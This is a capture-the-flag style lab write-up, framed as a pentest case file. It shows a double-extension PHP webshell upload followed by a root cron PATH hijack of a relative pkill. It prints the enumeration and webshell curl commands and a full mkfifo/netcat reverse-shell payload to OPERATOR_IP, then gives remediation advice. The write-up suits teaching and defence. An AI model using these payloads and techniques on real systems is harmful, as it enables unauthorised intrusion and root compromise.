Double-extension upload webshell and cron PATH hijack
Foundations Linux engagement: CV upload accepted shell.pdf.php; webshell as www-data; .bash_history and cron.d/persistence showed a relative pkill — planting ~/bin/pkill caught the next root cron for a reverse shell.
- Case files
- Double-extension upload webshell and cron PATH hijack
upload.php accepted a double-extension PHP shell under /cvs/. History and cron revealed a persistence job calling bare pkill; PATH plant returned root.
shell.pdf.php under /cvs/ executed whoami and read user.txt.
Planted ~/bin/pkill; persistence cron delivered a root reverse shell.
Engagement summary
upload.php accepted a double-extension PHP shell under /cvs/. History and cron revealed a persistence job calling bare pkill; PATH plant returned root.
HACKER VS HACKER was a recruitment site already under attacker control. Gobuster found /upload.php. A polyglot shell.pdf.php landed in /cvs/ and executed as the web user (?cmd=). Reading /home/lachlan/.bash_history and /etc/cron.d/persistence showed root periodically running pkill without an absolute path while lachlan’s PATH preferred ~/bin. Writing a reverse-shell script to /home/lachlan/bin/pkill and waiting for cron yielded a root shell.
Business impact
Extension-only upload filters are trivial to bypass. Relative binaries in root cron under a user-writable PATH are scheduled root RCE. Validate content-type and magic bytes, store uploads outside the webroot, and use absolute paths in privileged cron.
Double-extension webshell
shell.pdf.php under /cvs/ executed whoami and read user.txt.
OPERATOR · UPLOAD
savvy@lab:~$ gobuster dir -u http://10.10.10.50 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt
/upload.php /cvs/
savvy@lab:~$ # upload shell.pdf.php via CV form
savvy@lab:~$ curl -s 'http://10.10.10.50/cvs/shell.pdf.php?cmd=whoami'
www-data
savvy@lab:~$ curl -s 'http://10.10.10.50/cvs/shell.pdf.php?cmd=cat+/home/lachlan/user.txt'
Cron PATH hijack of pkill
Planted ~/bin/pkill; persistence cron delivered a root reverse shell.
PAYLOAD
~/bin/pkill
#!/bin/bash
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc OPERATOR_IP 1234 >/tmp/fOPERATOR · ROOT
savvy@lab:~$ curl -s 'http://10.10.10.50/cvs/shell.pdf.php?cmd=cat+/etc/cron.d/persistence'
# root job invokes relative pkill
savvy@lab:~$ nc -lvnp 1234
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Rewrite cron to /usr/bin/pkill; remove user-writable dirs from root PATH. Quarantine upload directories; scan and block double extensions.